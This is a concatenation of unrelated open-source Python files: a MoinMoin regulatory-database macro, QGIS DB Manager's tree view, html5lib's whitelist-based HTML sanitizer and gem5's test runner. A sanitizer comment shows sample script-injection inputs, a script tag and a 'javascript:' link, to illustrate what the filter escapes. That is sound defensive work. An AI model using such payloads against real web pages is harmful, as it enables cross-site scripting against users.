            f.text('%.3f - %.3f' % (perm.freqband.start, perm.freqband.end)),
            f.table_cell(0),
            f.table_cell(1),
            f.text('%.3f' % (perm.freqband.maxbw,)),
            f.table_cell(0),
            f.table_cell(1),
            f.text(', '.join(perm.textflags)),
            f.table_cell(0),
            f.table_cell(1),
            f.text(str_or_na(perm.power.max_ant_gain)),
            f.table_cell(0),
            f.table_cell(1),
            f.text(str_or_na(perm.power.max_eirp, dBm=True)),
            f.table_cell(0),
            f.table_row(0),
        ])
    result.append(f.table(0))

    result.append(f.linebreak(0))
    result.append(f.linebreak(0))
    result.append(macro.request.page.link_to(macro.request, 'return to country list'))

    return ''.join(result)
# Lazily populated cache mapping ISO 3166 alpha-2 codes to country names.
_iso_list = {}


def _get_iso_code(code):
    """Return the country name for *code*, or 'Unknown (<code>)'.

    Loads the iso-codes table from disk once on first use.
    """
    if not _iso_list:
        # Tab-separated file shipped by the distro's iso-codes package;
        # each line is "<alpha2>\t<name>".
        for line in codecs.open('/usr/share/iso-codes/iso_3166.tab', encoding='utf-8'):
            line = line.strip()
            c, name = line.split('\t')
            _iso_list[c] = name
    return _iso_list.get(code, 'Unknown (%s)' % code)
def macro_Regulatory(macro):
    """MoinMoin macro entry point for the regulatory database pages.

    Depending on query parameters, renders one of three views:
    the raw database dump (?raw=1), a single country (?alpha2=XX),
    or the sorted country index (default).
    """
    _ = macro.request.getText
    request = macro.request
    f = macro.formatter

    # MoinMoin form values arrive as lists; take the first entry.
    country = request.form.get('alpha2', [None])[0]

    dbpath = '/tmp/db.txt'
    if hasattr(request.cfg, 'regdb_path'):
        dbpath = request.cfg.regdb_path

    result = []

    if request.form.get('raw', [None])[0]:
        # Raw view: the database file as a numbered code listing.
        result.append(f.code_area(1, 'db-raw', show=1, start=1, step=1))
        for line in open(dbpath):
            result.extend([
                f.code_line(1),
                f.text(line.rstrip()),
                f.code_line(0),
            ])
        result.append(f.code_area(0, 'db-raw'))
        result.append(macro.request.page.link_to(macro.request, 'return to country list'))
        return ''.join(result)

    # Parse the database, collecting (not printing) parser warnings.
    warnings = []
    countries = DBParser(warn=lambda x: warnings.append(x)).parse(open(dbpath))

    if country:
        return _country(macro, countries, country)

    # Index view: country names sorted alphabetically, each linking back to
    # this macro with its alpha2 code.
    countries = countries.keys()
    countries = [(_get_iso_code(code), code) for code in countries]
    countries.sort()
    result.extend([
        f.heading(1, 1),
        f.text('Countries'),
        f.heading(0, 1),
    ])
    result.append(f.bullet_list(1))
    for name, code in countries:
        result.extend([
            f.listitem(1),
            request.page.link_to(request, name, querystr={'alpha2': code}),
            f.listitem(0),
        ])
    result.append(f.bullet_list(0))

    if warnings:
        result.append(f.heading(1, 2))
        result.append(f.text("Warnings"))
        result.append(f.heading(0, 2))
        result.append(f.preformatted(1))
        result.extend(warnings)
        result.append(f.preformatted(0))

    result.append(request.page.link_to(request, 'view raw database', querystr={'raw': 1}))

    return ''.join(result)
| isc |
DelazJ/QGIS | python/plugins/db_manager/db_tree.py | 41 | 6556 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
Name : DB Manager
Description : Database manager plugin for QGIS
Date : May 23, 2011
copyright : (C) 2011 by Giuseppe Sucameli
email : brush.tyler@gmail.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from qgis.PyQt.QtCore import pyqtSignal, QCoreApplication
from qgis.PyQt.QtWidgets import QWidget, QTreeView, QMenu, QLabel
from qgis.core import Qgis, QgsProject, QgsMessageLog
from qgis.gui import QgsMessageBar, QgsMessageBarItem
from .db_model import DBModel, PluginItem
from .db_plugins.plugin import DBPlugin, Schema, Table
class DBTree(QTreeView):
    """Tree view of database connections / schemas / tables for DB Manager.

    Wraps a DBModel and forwards selection changes to the main window via
    the selectedItemChanged signal.
    """

    # Emitted with the newly selected model item (or None).
    selectedItemChanged = pyqtSignal(object)

    def __init__(self, mainWindow):
        QTreeView.__init__(self, mainWindow)
        self.mainWindow = mainWindow
        self.setModel(DBModel(self))
        self.setHeaderHidden(True)
        self.setEditTriggers(QTreeView.EditKeyPressed | QTreeView.SelectedClicked)
        # Drag & drop is used to import/export tables between connections.
        self.setDragEnabled(True)
        self.setAcceptDrops(True)
        self.setDropIndicatorShown(True)

        self.doubleClicked.connect(self.addLayer)
        self.selectionModel().currentChanged.connect(self.currentItemChanged)
        self.expanded.connect(self.itemChanged)
        self.collapsed.connect(self.itemChanged)
        self.model().dataChanged.connect(self.modelDataChanged)
        self.model().notPopulated.connect(self.collapse)

    def refreshItem(self, item=None):
        """Re-query the given item (default: current selection) from its source."""
        if item is None:
            item = self.currentItem()
            if item is None:
                return
        self.model().refreshItem(item)

    def showSystemTables(self, show):
        # Placeholder; filtering of system tables is not implemented here.
        pass

    def currentItem(self):
        """Return the model item behind the current selection, or None."""
        indexes = self.selectedIndexes()
        if len(indexes) <= 0:
            return
        return self.model().getItem(indexes[0])

    def currentDatabase(self):
        """Return the database owning the current item, or None."""
        item = self.currentItem()
        if item is None:
            return

        if isinstance(item, (DBPlugin, Schema, Table)):
            return item.database()
        return None

    def currentSchema(self):
        """Return the schema owning the current item, or None."""
        item = self.currentItem()
        if item is None:
            return

        if isinstance(item, (Schema, Table)):
            return item.schema()
        return None

    def currentTable(self):
        """Return the current item if it is a table, else None."""
        item = self.currentItem()
        if isinstance(item, Table):
            return item
        return None

    def newConnection(self):
        """Open the add-connection dialog for the selected plugin root item."""
        index = self.currentIndex()
        if not index.isValid() or not isinstance(index.internalPointer(), PluginItem):
            return
        item = self.currentItem()
        self.mainWindow.invokeCallback(item.addConnectionActionSlot, index)

    def itemChanged(self, index):
        """Select *index* and notify listeners of the new current item."""
        self.setCurrentIndex(index)
        self.selectedItemChanged.emit(self.currentItem())

    def modelDataChanged(self, indexFrom, indexTo):
        self.itemChanged(indexTo)

    def currentItemChanged(self, current, previous):
        self.itemChanged(current)

    def contextMenuEvent(self, ev):
        """Build and show the context menu appropriate for the clicked item."""
        index = self.indexAt(ev.pos())
        if not index.isValid():
            return

        # Right-clicking also selects, so menu actions act on the clicked item.
        if index != self.currentIndex():
            self.itemChanged(index)
        item = self.currentItem()

        menu = QMenu(self)

        if isinstance(item, (Table, Schema)):
            menu.addAction(QCoreApplication.translate("DBTree", "Rename…"), self.rename)
            menu.addAction(QCoreApplication.translate("DBTree", "Delete…"), self.delete)

            if isinstance(item, Table) and item.canBeAddedToCanvas():
                menu.addSeparator()
                menu.addAction(self.tr("Add to Canvas"), self.addLayer)

            item.addExtraContextMenuEntries(menu)

        elif isinstance(item, DBPlugin):
            if item.database() is not None:
                menu.addAction(self.tr("Re-connect"), self.reconnect)
            menu.addAction(self.tr("Remove"), self.delete)

        elif not index.parent().isValid() and item.typeName() in ("spatialite", "gpkg"):
            # File-based providers can create a new connection from the root.
            menu.addAction(QCoreApplication.translate("DBTree", "New Connection…"), self.newConnection)

        if not menu.isEmpty():
            menu.exec_(ev.globalPos())

        menu.deleteLater()

    def rename(self):
        """Start inline editing of the selected table/schema name."""
        item = self.currentItem()
        if isinstance(item, (Table, Schema)):
            self.edit(self.currentIndex())

    def delete(self):
        """Delete the selected table/schema, or remove a connection."""
        item = self.currentItem()
        if isinstance(item, (Table, Schema)):
            self.mainWindow.invokeCallback(item.database().deleteActionSlot)
        elif isinstance(item, DBPlugin):
            self.mainWindow.invokeCallback(item.removeActionSlot)

    def addLayer(self):
        """Add the selected table to the QGIS canvas as a map layer."""
        table = self.currentTable()
        if table is not None:
            layer = table.toMapLayer()
            layers = QgsProject.instance().addMapLayers([layer])
            if len(layers) != 1:
                # Invalid layer: log it and surface a clickable message-bar
                # warning pointing at the message log.
                QgsMessageLog.logMessage(
                    self.tr("%1 is an invalid layer - not loaded").replace("%1", layer.publicSource()))
                msgLabel = QLabel(self.tr(
                    "%1 is an invalid layer and cannot be loaded. Please check the <a href=\"#messageLog\">message log</a> for further info.").replace(
                    "%1", layer.publicSource()), self.mainWindow.infoBar)
                msgLabel.setWordWrap(True)
                msgLabel.linkActivated.connect(self.mainWindow.iface.mainWindow().findChild(QWidget, "MessageLog").show)
                msgLabel.linkActivated.connect(self.mainWindow.iface.mainWindow().raise_)
                self.mainWindow.infoBar.pushItem(QgsMessageBarItem(msgLabel, Qgis.Warning))

    def reconnect(self):
        """Re-open the connection for the selected database."""
        db = self.currentDatabase()
        if db is not None:
            self.mainWindow.invokeCallback(db.reconnectActionSlot)
| gpl-2.0 |
drglove/SickRage | lib/html5lib/sanitizer.py | 805 | 16428 | from __future__ import absolute_import, division, unicode_literals
import re
from xml.sax.saxutils import escape, unescape
from .tokenizer import HTMLTokenizer
from .constants import tokenTypes
class HTMLSanitizerMixin(object):
    """ sanitization of XHTML+MathML+SVG and of inline style attributes."""

    # --- Whitelists. Anything not listed is escaped (elements) or dropped
    # --- (attributes, CSS properties, URI schemes).

    acceptable_elements = ['a', 'abbr', 'acronym', 'address', 'area',
                           'article', 'aside', 'audio', 'b', 'big', 'blockquote', 'br', 'button',
                           'canvas', 'caption', 'center', 'cite', 'code', 'col', 'colgroup',
                           'command', 'datagrid', 'datalist', 'dd', 'del', 'details', 'dfn',
                           'dialog', 'dir', 'div', 'dl', 'dt', 'em', 'event-source', 'fieldset',
                           'figcaption', 'figure', 'footer', 'font', 'form', 'header', 'h1',
                           'h2', 'h3', 'h4', 'h5', 'h6', 'hr', 'i', 'img', 'input', 'ins',
                           'keygen', 'kbd', 'label', 'legend', 'li', 'm', 'map', 'menu', 'meter',
                           'multicol', 'nav', 'nextid', 'ol', 'output', 'optgroup', 'option',
                           'p', 'pre', 'progress', 'q', 's', 'samp', 'section', 'select',
                           'small', 'sound', 'source', 'spacer', 'span', 'strike', 'strong',
                           'sub', 'sup', 'table', 'tbody', 'td', 'textarea', 'time', 'tfoot',
                           'th', 'thead', 'tr', 'tt', 'u', 'ul', 'var', 'video']

    mathml_elements = ['maction', 'math', 'merror', 'mfrac', 'mi',
                       'mmultiscripts', 'mn', 'mo', 'mover', 'mpadded', 'mphantom',
                       'mprescripts', 'mroot', 'mrow', 'mspace', 'msqrt', 'mstyle', 'msub',
                       'msubsup', 'msup', 'mtable', 'mtd', 'mtext', 'mtr', 'munder',
                       'munderover', 'none']

    svg_elements = ['a', 'animate', 'animateColor', 'animateMotion',
                    'animateTransform', 'clipPath', 'circle', 'defs', 'desc', 'ellipse',
                    'font-face', 'font-face-name', 'font-face-src', 'g', 'glyph', 'hkern',
                    'linearGradient', 'line', 'marker', 'metadata', 'missing-glyph',
                    'mpath', 'path', 'polygon', 'polyline', 'radialGradient', 'rect',
                    'set', 'stop', 'svg', 'switch', 'text', 'title', 'tspan', 'use']

    acceptable_attributes = ['abbr', 'accept', 'accept-charset', 'accesskey',
                             'action', 'align', 'alt', 'autocomplete', 'autofocus', 'axis',
                             'background', 'balance', 'bgcolor', 'bgproperties', 'border',
                             'bordercolor', 'bordercolordark', 'bordercolorlight', 'bottompadding',
                             'cellpadding', 'cellspacing', 'ch', 'challenge', 'char', 'charoff',
                             'choff', 'charset', 'checked', 'cite', 'class', 'clear', 'color',
                             'cols', 'colspan', 'compact', 'contenteditable', 'controls', 'coords',
                             'data', 'datafld', 'datapagesize', 'datasrc', 'datetime', 'default',
                             'delay', 'dir', 'disabled', 'draggable', 'dynsrc', 'enctype', 'end',
                             'face', 'for', 'form', 'frame', 'galleryimg', 'gutter', 'headers',
                             'height', 'hidefocus', 'hidden', 'high', 'href', 'hreflang', 'hspace',
                             'icon', 'id', 'inputmode', 'ismap', 'keytype', 'label', 'leftspacing',
                             'lang', 'list', 'longdesc', 'loop', 'loopcount', 'loopend',
                             'loopstart', 'low', 'lowsrc', 'max', 'maxlength', 'media', 'method',
                             'min', 'multiple', 'name', 'nohref', 'noshade', 'nowrap', 'open',
                             'optimum', 'pattern', 'ping', 'point-size', 'poster', 'pqg', 'preload',
                             'prompt', 'radiogroup', 'readonly', 'rel', 'repeat-max', 'repeat-min',
                             'replace', 'required', 'rev', 'rightspacing', 'rows', 'rowspan',
                             'rules', 'scope', 'selected', 'shape', 'size', 'span', 'src', 'start',
                             'step', 'style', 'summary', 'suppress', 'tabindex', 'target',
                             'template', 'title', 'toppadding', 'type', 'unselectable', 'usemap',
                             'urn', 'valign', 'value', 'variable', 'volume', 'vspace', 'vrml',
                             'width', 'wrap', 'xml:lang']

    mathml_attributes = ['actiontype', 'align', 'columnalign', 'columnalign',
                         'columnalign', 'columnlines', 'columnspacing', 'columnspan', 'depth',
                         'display', 'displaystyle', 'equalcolumns', 'equalrows', 'fence',
                         'fontstyle', 'fontweight', 'frame', 'height', 'linethickness', 'lspace',
                         'mathbackground', 'mathcolor', 'mathvariant', 'mathvariant', 'maxsize',
                         'minsize', 'other', 'rowalign', 'rowalign', 'rowalign', 'rowlines',
                         'rowspacing', 'rowspan', 'rspace', 'scriptlevel', 'selection',
                         'separator', 'stretchy', 'width', 'width', 'xlink:href', 'xlink:show',
                         'xlink:type', 'xmlns', 'xmlns:xlink']

    svg_attributes = ['accent-height', 'accumulate', 'additive', 'alphabetic',
                      'arabic-form', 'ascent', 'attributeName', 'attributeType',
                      'baseProfile', 'bbox', 'begin', 'by', 'calcMode', 'cap-height',
                      'class', 'clip-path', 'color', 'color-rendering', 'content', 'cx',
                      'cy', 'd', 'dx', 'dy', 'descent', 'display', 'dur', 'end', 'fill',
                      'fill-opacity', 'fill-rule', 'font-family', 'font-size',
                      'font-stretch', 'font-style', 'font-variant', 'font-weight', 'from',
                      'fx', 'fy', 'g1', 'g2', 'glyph-name', 'gradientUnits', 'hanging',
                      'height', 'horiz-adv-x', 'horiz-origin-x', 'id', 'ideographic', 'k',
                      'keyPoints', 'keySplines', 'keyTimes', 'lang', 'marker-end',
                      'marker-mid', 'marker-start', 'markerHeight', 'markerUnits',
                      'markerWidth', 'mathematical', 'max', 'min', 'name', 'offset',
                      'opacity', 'orient', 'origin', 'overline-position',
                      'overline-thickness', 'panose-1', 'path', 'pathLength', 'points',
                      'preserveAspectRatio', 'r', 'refX', 'refY', 'repeatCount',
                      'repeatDur', 'requiredExtensions', 'requiredFeatures', 'restart',
                      'rotate', 'rx', 'ry', 'slope', 'stemh', 'stemv', 'stop-color',
                      'stop-opacity', 'strikethrough-position', 'strikethrough-thickness',
                      'stroke', 'stroke-dasharray', 'stroke-dashoffset', 'stroke-linecap',
                      'stroke-linejoin', 'stroke-miterlimit', 'stroke-opacity',
                      'stroke-width', 'systemLanguage', 'target', 'text-anchor', 'to',
                      'transform', 'type', 'u1', 'u2', 'underline-position',
                      'underline-thickness', 'unicode', 'unicode-range', 'units-per-em',
                      'values', 'version', 'viewBox', 'visibility', 'width', 'widths', 'x',
                      'x-height', 'x1', 'x2', 'xlink:actuate', 'xlink:arcrole',
                      'xlink:href', 'xlink:role', 'xlink:show', 'xlink:title', 'xlink:type',
                      'xml:base', 'xml:lang', 'xml:space', 'xmlns', 'xmlns:xlink', 'y',
                      'y1', 'y2', 'zoomAndPan']

    # Attributes whose value is a URI and must pass the protocol whitelist.
    attr_val_is_uri = ['href', 'src', 'cite', 'action', 'longdesc', 'poster',
                       'xlink:href', 'xml:base']

    # SVG attributes that may contain url(...) references, which are stripped.
    svg_attr_val_allows_ref = ['clip-path', 'color-profile', 'cursor', 'fill',
                               'filter', 'marker', 'marker-start', 'marker-mid', 'marker-end',
                               'mask', 'stroke']

    # SVG elements whose local (fragment) xlink:href is disallowed.
    svg_allow_local_href = ['altGlyph', 'animate', 'animateColor',
                            'animateMotion', 'animateTransform', 'cursor', 'feImage', 'filter',
                            'linearGradient', 'pattern', 'radialGradient', 'textpath', 'tref',
                            'set', 'use']

    acceptable_css_properties = ['azimuth', 'background-color',
                                 'border-bottom-color', 'border-collapse', 'border-color',
                                 'border-left-color', 'border-right-color', 'border-top-color', 'clear',
                                 'color', 'cursor', 'direction', 'display', 'elevation', 'float', 'font',
                                 'font-family', 'font-size', 'font-style', 'font-variant', 'font-weight',
                                 'height', 'letter-spacing', 'line-height', 'overflow', 'pause',
                                 'pause-after', 'pause-before', 'pitch', 'pitch-range', 'richness',
                                 'speak', 'speak-header', 'speak-numeral', 'speak-punctuation',
                                 'speech-rate', 'stress', 'text-align', 'text-decoration', 'text-indent',
                                 'unicode-bidi', 'vertical-align', 'voice-family', 'volume',
                                 'white-space', 'width']

    acceptable_css_keywords = ['auto', 'aqua', 'black', 'block', 'blue',
                               'bold', 'both', 'bottom', 'brown', 'center', 'collapse', 'dashed',
                               'dotted', 'fuchsia', 'gray', 'green', '!important', 'italic', 'left',
                               'lime', 'maroon', 'medium', 'none', 'navy', 'normal', 'nowrap', 'olive',
                               'pointer', 'purple', 'red', 'right', 'solid', 'silver', 'teal', 'top',
                               'transparent', 'underline', 'white', 'yellow']

    acceptable_svg_properties = ['fill', 'fill-opacity', 'fill-rule',
                                 'stroke', 'stroke-width', 'stroke-linecap', 'stroke-linejoin',
                                 'stroke-opacity']

    acceptable_protocols = ['ed2k', 'ftp', 'http', 'https', 'irc',
                            'mailto', 'news', 'gopher', 'nntp', 'telnet', 'webcal',
                            'xmpp', 'callto', 'feed', 'urn', 'aim', 'rsync', 'tag',
                            'ssh', 'sftp', 'rtsp', 'afs']

    # subclasses may define their own versions of these constants
    allowed_elements = acceptable_elements + mathml_elements + svg_elements
    allowed_attributes = acceptable_attributes + mathml_attributes + svg_attributes
    allowed_css_properties = acceptable_css_properties
    allowed_css_keywords = acceptable_css_keywords
    allowed_svg_properties = acceptable_svg_properties
    allowed_protocols = acceptable_protocols

    # Sanitize the +html+, escaping all elements not in ALLOWED_ELEMENTS, and
    # stripping out all # attributes not in ALLOWED_ATTRIBUTES. Style
    # attributes are parsed, and a restricted set, # specified by
    # ALLOWED_CSS_PROPERTIES and ALLOWED_CSS_KEYWORDS, are allowed through.
    # attributes in ATTR_VAL_IS_URI are scanned, and only URI schemes specified
    # in ALLOWED_PROTOCOLS are allowed.
    #
    #   sanitize_html('<script> do_nasty_stuff() </script>')
    #    => &lt;script> do_nasty_stuff() &lt;/script>
    #   sanitize_html('<a href="javascript: sucker();">Click here for $100</a>')
    #    => <a>Click here for $100</a>
    def sanitize_token(self, token):
        """Sanitize one tokenizer token; returns the (possibly rewritten)
        token, or None to drop it (comments are dropped)."""

        # accommodate filters which use token_type differently
        token_type = token["type"]
        if token_type in list(tokenTypes.keys()):
            token_type = tokenTypes[token_type]

        if token_type in (tokenTypes["StartTag"], tokenTypes["EndTag"],
                          tokenTypes["EmptyTag"]):
            if token["name"] in self.allowed_elements:
                return self.allowed_token(token, token_type)
            else:
                return self.disallowed_token(token, token_type)
        elif token_type == tokenTypes["Comment"]:
            # Comments are silently removed.
            pass
        else:
            return token

    def allowed_token(self, token, token_type):
        """Filter the attributes of a whitelisted element token."""
        if "data" in token:
            # Reversed so that, for duplicate attribute names, the first
            # occurrence in source order wins in the resulting dict.
            attrs = dict([(name, val) for name, val in
                          token["data"][::-1]
                          if name in self.allowed_attributes])
            for attr in self.attr_val_is_uri:
                if attr not in attrs:
                    continue
                # Strip control/space characters that browsers ignore before
                # matching the scheme, to defeat e.g. "java\0script:".
                val_unescaped = re.sub("[`\000-\040\177-\240\s]+", '',
                                       unescape(attrs[attr])).lower()
                # remove replacement characters from unescaped characters
                val_unescaped = val_unescaped.replace("\ufffd", "")
                if (re.match("^[a-z0-9][-+.a-z0-9]*:", val_unescaped) and
                        (val_unescaped.split(':')[0] not in
                         self.allowed_protocols)):
                    del attrs[attr]
            for attr in self.svg_attr_val_allows_ref:
                if attr in attrs:
                    # Neutralize non-local url(...) references.
                    attrs[attr] = re.sub(r'url\s*\(\s*[^#\s][^)]+?\)',
                                         ' ',
                                         unescape(attrs[attr]))
            if (token["name"] in self.svg_allow_local_href and
                    'xlink:href' in attrs and re.search('^\s*[^#\s].*',
                                                        attrs['xlink:href'])):
                del attrs['xlink:href']
            if 'style' in attrs:
                attrs['style'] = self.sanitize_css(attrs['style'])
            token["data"] = [[name, val] for name, val in list(attrs.items())]
        return token

    def disallowed_token(self, token, token_type):
        """Turn a non-whitelisted tag token into escaped character data."""
        if token_type == tokenTypes["EndTag"]:
            token["data"] = "</%s>" % token["name"]
        elif token["data"]:
            attrs = ''.join([' %s="%s"' % (k, escape(v)) for k, v in token["data"]])
            token["data"] = "<%s%s>" % (token["name"], attrs)
        else:
            token["data"] = "<%s>" % token["name"]
        if token.get("selfClosing"):
            token["data"] = token["data"][:-1] + "/>"

        if token["type"] in list(tokenTypes.keys()):
            token["type"] = "Characters"
        else:
            token["type"] = tokenTypes["Characters"]

        del token["name"]
        return token

    def sanitize_css(self, style):
        """Return *style* reduced to whitelisted CSS; '' if it looks unsafe."""
        # disallow urls
        style = re.compile('url\s*\(\s*[^\s)]+?\s*\)\s*').sub(' ', style)

        # gauntlet: reject any style string containing characters outside a
        # conservative whitelist before attempting to parse it.
        if not re.match("""^([:,;#%.\sa-zA-Z0-9!]|\w-\w|'[\s\w]+'|"[\s\w]+"|\([\d,\s]+\))*$""", style):
            return ''
        if not re.match("^\s*([-\w]+\s*:[^:;]*(;\s*|$))*$", style):
            return ''

        clean = []
        for prop, value in re.findall("([-\w]+)\s*:\s*([^:;]*)", style):
            if not value:
                continue
            if prop.lower() in self.allowed_css_properties:
                clean.append(prop + ': ' + value + ';')
            elif prop.split('-')[0].lower() in ['background', 'border', 'margin',
                                                'padding']:
                # Shorthand properties pass only if every keyword is safe.
                for keyword in value.split():
                    if not keyword in self.acceptable_css_keywords and \
                            not re.match("^(#[0-9a-f]+|rgb\(\d+%?,\d*%?,?\d*%?\)?|\d{0,2}\.?\d{0,2}(cm|em|ex|in|mm|pc|pt|px|%|,|\))?)$", keyword):
                        break
                else:
                    clean.append(prop + ': ' + value + ';')
            elif prop.lower() in self.allowed_svg_properties:
                clean.append(prop + ': ' + value + ';')

        return ' '.join(clean)
class HTMLSanitizer(HTMLTokenizer, HTMLSanitizerMixin):
    """Tokenizer that sanitizes each token as it is produced."""

    def __init__(self, stream, encoding=None, parseMeta=True, useChardet=True,
                 lowercaseElementName=False, lowercaseAttrName=False, parser=None):
        # Change case matching defaults as we only output lowercase html anyway
        # This solution doesn't seem ideal...
        HTMLTokenizer.__init__(self, stream, encoding, parseMeta, useChardet,
                               lowercaseElementName, lowercaseAttrName, parser=parser)

    def __iter__(self):
        # Yield only tokens that survive sanitization (sanitize_token
        # returns None for dropped tokens such as comments).
        for token in HTMLTokenizer.__iter__(self):
            token = self.sanitize_token(token)
            if token:
                yield token
| gpl-3.0 |
BellScurry/gem5-fault-injection | tests/tests.py | 10 | 12420 | #!/usr/bin/env python
#
# Copyright (c) 2016 ARM Limited
# All rights reserved
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Sandberg
import argparse
import sys
import os
import pickle
from testing.tests import *
import testing.results
class ParagraphHelpFormatter(argparse.HelpFormatter):
    """argparse help formatter that preserves paragraph breaks.

    The stock formatter re-flows the whole description as one block; this
    one wraps each blank-line-separated paragraph independently and keeps
    the blank lines between them.
    """

    def _fill_text(self, text, width, indent):
        wrapped = []
        for paragraph in text.split("\n\n"):
            wrapped.append(
                super(ParagraphHelpFormatter, self)._fill_text(
                    paragraph, width, indent))
        return "\n\n".join(wrapped)
# Maps the --format command line choice to its result-formatter class.
formatters = {
    "junit": testing.results.JUnit,
    "text": testing.results.Text,
    "summary": testing.results.TextSummary,
    "pickle": testing.results.Pickle,
}
def _add_format_args(parser):
    """Add the output-formatting options shared by the run/show/test
    sub-commands to *parser*."""
    parser.add_argument("--format", choices=formatters, default="text",
                        help="Output format")
    parser.add_argument("--no-junit-xlate-names", action="store_true",
                        help="Don't translate test names to " \
                        "package-like names")
    parser.add_argument("--output", "-o",
                        type=argparse.FileType('w'), default=sys.stdout,
                        help="Test result output file")
def _create_formatter(args):
    """Instantiate the result formatter selected by args.format."""
    formatter_cls = formatters[args.format]
    kwargs = dict(fout=args.output, verbose=args.verbose)
    # JUnit output can optionally rewrite test names into a Java-package
    # style that CI parsers expect.
    if issubclass(formatter_cls, testing.results.JUnit):
        kwargs["translate_names"] = not args.no_junit_xlate_names
    return formatter_cls(**kwargs)
def _list_tests_args(subparsers):
    """Register the 'list' sub-command and its arguments."""
    parser = subparsers.add_parser(
        "list",
        formatter_class=ParagraphHelpFormatter,
        help="List available tests",
        description="List available tests",
        epilog="""
        Generate a list of available tests using a list filter.

        The filter is a string consisting of the target ISA optionally
        followed by the test category and mode separated by
        slashes. The test names emitted by this command can be fed
        into the run command.

        For example, to list all quick arm tests, run the following:

        tests.py list arm/quick

        Non-mandatory parts of the filter string (anything other than
        the ISA) can be left out or replaced with the wildcard
        character. For example, all full-system tests can be listed
        with this command: tests.py list arm/*/fs""")

    parser.add_argument("--ruby-protocol", type=str, default=None,
                        help="Ruby protocol")
    parser.add_argument("--gpu-isa", type=str, default=None,
                        help="GPU ISA")
    parser.add_argument("list_filter", metavar="ISA[/category/mode]",
                        action="append", type=str,
                        help="List available test cases")
def _list_tests(args):
    """Print the tests matching each list filter, one 'a/b/c' tuple per
    line, then exit with status 0. (Python 2 print statements.)"""
    for isa, categories, modes in \
        ( parse_test_filter(f) for f in args.list_filter ):
        for test in get_tests(isa, categories=categories, modes=modes,
                              ruby_protocol=args.ruby_protocol,
                              gpu_isa=args.gpu_isa):
            print "/".join(test)
    sys.exit(0)
def _run_tests_args(subparsers):
    """Register the 'run' sub-command and its arguments."""
    parser = subparsers.add_parser(
        "run",
        formatter_class=ParagraphHelpFormatter,
        help='Run one or more tests',
        description="Run one or more tests.",
        epilog="""
        Run one or more tests described by a gem5 test tuple.

        The test tuple consists of a test category (quick or long), a
        test mode (fs or se), a workload name, an isa, an operating
        system, and a config name separate by slashes. For example:

        quick/se/00.hello/arm/linux/simple-timing

        Available tests can be listed using the 'list' sub-command
        (e.g., "tests.py list arm/quick" or one of the scons test list
        targets (e.g., "scons build/ARM/tests/opt/quick.list").

        The test results can be stored in multiple different output
        formats. See the help for the show command for more details
        about output formatting.""")

    parser.add_argument("gem5", type=str,
                        help="gem5 binary")
    parser.add_argument("test", type=str, nargs="*",
                        help="List of tests to execute")
    parser.add_argument("--directory", "-d",
                        type=str, default="m5tests",
                        help="Test work directory")
    parser.add_argument("--timeout", "-t",
                        type=int, default="0", metavar="MINUTES",
                        help="Timeout, 0 to disable")
    parser.add_argument("--skip-diff-out", action="store_true",
                        help="Skip output diffing stage")
    parser.add_argument("--skip-diff-stat", action="store_true",
                        help="Skip stat diffing stage")
    _add_format_args(parser)
def _run_tests(args):
    """Run each requested test in its own work directory and dump the
    collected results through the selected formatter."""
    formatter = _create_formatter(args)

    out_base = os.path.abspath(args.directory)
    if not os.path.exists(out_base):
        os.mkdir(out_base)

    # Build one ClassicTest per requested test tuple; the work directory
    # mirrors the tuple's path form under out_base.
    tests = []
    for test_name in args.test:
        config = ClassicConfig(*test_name.split("/"))
        out_dir = os.path.join(out_base, "/".join(config))
        tests.append(
            ClassicTest(args.gem5, out_dir, config,
                        timeout=args.timeout,
                        skip_diff_stat=args.skip_diff_stat,
                        skip_diff_out=args.skip_diff_out))

    all_results = []
    # Python 2 print statements; tests run sequentially.
    print "Running %i tests" % len(tests)
    for testno, test in enumerate(tests):
        print "%i: Running '%s'..." % (testno, test)
        all_results.append(test.run())

    formatter.dump_suites(all_results)
def _show_args(subparsers):
    """Register the 'show' sub-command and its arguments."""
    parser = subparsers.add_parser(
        "show",
        formatter_class=ParagraphHelpFormatter,
        help='Display pickled test results',
        description='Display pickled test results',
        epilog="""
        Reformat the pickled output from one or more test runs. This
        command is typically used with the output from a single test
        run, but it can also be used to merge the outputs from
        multiple runs.

        The 'text' format is a verbose output format that provides
        information about individual test units and the output from
        failed tests. It's mainly useful for debugging test failures.

        The 'summary' format provides outputs the results of one test
        per line with the test's overall status (OK, SKIPPED, or
        FAILED).

        The 'junit' format is primarily intended for use with CI
